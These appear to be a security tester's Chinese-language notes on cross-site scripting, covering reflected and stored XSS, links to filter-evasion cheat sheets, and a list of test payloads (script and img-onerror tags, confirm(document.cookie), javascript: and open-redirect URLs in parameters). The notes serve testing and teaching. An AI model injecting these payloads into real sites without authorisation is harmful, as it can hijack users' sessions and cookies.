测试的时候会涉及到xss测试,下面简要整理下xss的知识
xss跨站脚本特点就是能注入恶意的HTML/JS代码到用户浏览器,劫持用户会话,如果确认存在漏洞,会随着注入的内容不同而产生危害比如:窃取cookie,网页挂马,恶意操作,跨站蠕虫等等
分类:
反射型:非持久,一般为一个url,需要用户单击,在url中参数传入
持久型:常存在于评论等交互中,常见于<textarea>这种标签,可用于挂马钓鱼渗透等
可见,为了防止xss,字符过滤可以有效的较少被攻击的危害,但是xss攻击不止这么简单,
它还可以绕过服务端的xss过滤!!!待续
ps:常用的xss攻击语句列表
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet 英文
http://drops.wooyun.org/tips/1955 中文
如果可以发现最基础的xss可以执行,那么就可以注入其他有害的操作或者获取信息
例如一些javacript事件:onerror,onfocus,onclick,ontimeout。。。
http://wenku.baidu.com/link?url=q9-QLRlKm788Hdn7F0-Fy2Ujqg8N995-DLk4cS_cXdds1h9lQIvtGf78KbUM55GtKiS6qTwd--Aj6YSsEh2YmiB4VZ611J3pwdj0AeSeApi
--------------------------------------------------------------------------
/***********工作中用到渗透语句:******************/
1. 跨站攻击
输入框测试
<--测试方法-->
(1)<a href="javascript:alert(1)"/>我的评论</a>
(2)cookies
"/><script>confirm(document.cookie)
<script>confirm(document.cookie)</scr
(3)<script>alert(1)</script>
2. URL跳转漏洞
<--测试方法-->
修改参数中的合法URL为非法URL,然后查看是否能正常跳转或者响应包是否包含了任意的构造URL
例子:
(1)http:/xxx.com.cn/post.do?retUrl=javascript:alert(document.cookie)
直接注入到URl里面了
(2)访问http://xxx.com.cn/login.do?retUrl=http://www.baidu.com
登录后即可跳转到www.baidu.com
3. 存储型跨站
<--测试方法-->
会把攻击者的数据存储在服务器端,攻击行为将伴随着攻击数据一直存在
例子:
在页面源代码中修改回复内容添加
<img src=http://xxx.com.cn/tesad.gif onerror=alert(666) />
4.参数跨站
<--测试方法-->
http://xxx.com.cn/usr/user.jsp?param_prov=&gender=&prov=&city=&birthday=%3Cscript%3Ealert%281%29%3C/script%3E